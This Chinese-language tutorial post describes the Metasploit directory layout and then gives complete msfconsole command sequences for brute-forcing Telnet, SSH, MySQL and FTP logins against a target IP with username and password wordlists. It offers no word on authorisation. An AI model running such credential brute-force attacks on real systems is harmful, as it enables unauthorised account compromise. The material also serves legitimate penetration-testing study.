Metasploit 目录结构

admin

[md]### Metasploit 目录结构

目录地址：`/usr/share/metasploit-framework/`

最重要的目录是 `data`，`modules`，`scripts`，`tools`，`plugins`

### data 目录

存放 `meterpreter`，`exploits`，`wordlists` 等。
**meterpreter** 是 msf 的测试载荷，使用于后渗透阶段

**exploits** 里面则存放了许多的 cve 漏洞利用代码

**wordlists** 里面放的是字典文件

### modules 目录

`metasploit` 的核心目录了，存放着各个测试模块。用于完成测试。
### scirpts 目录

存放一些 msf 用到的脚本文件，如 `meterpreter`，`ps`，`resource`，`shell`等常见的脚本。
### tools 目录

存放各种可使用的工具
### plugins 目录

存放 msf 的各种插件
## Metasploit 爆破篇

#### 爆破 TELNET
```
use auxiliary/scanner/telnet/telnet_login
set RHOSTS 192.168.1.1 #目标ip
set STOP_ON_SUCCESS true #爆破成功就停止 msf
set VERBOSE true #打印输出
set USER_FILE /root/Desktop/username.txt
set PASS_FILE /root/Desktop/password.txt
run
```
### 爆破 SSH
```
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.1
set STOP_ON_SUCCESS true #爆破成功就停止 msf
set VERBOSE true #打印输出
set USER_FILE /root/Desktop/username.txt
set PASS_FILE /root/Desktop/password.txt
set THREADS 50
run

```
### 爆破 MySQL
**ps**需目标主机开启`3306`端口和远程登录账号
```
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.101
set STOP_ON_SUCCESS true #爆破成功就停止 msf
set VERBOSE true #打印输出
set USER_FILE /root/Desktop/username.txt
set PASS_FILE /root/Desktop/password.txt
run

```
### 爆破 FTP
```
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.1.1
set STOP_ON_SUCCESS true #爆破成功就停止
set VERBOSE true #打印输出
set USERNAME admin # frp账号
set PASS_FILE /root/Desktop/password.txt
run
```

[/md]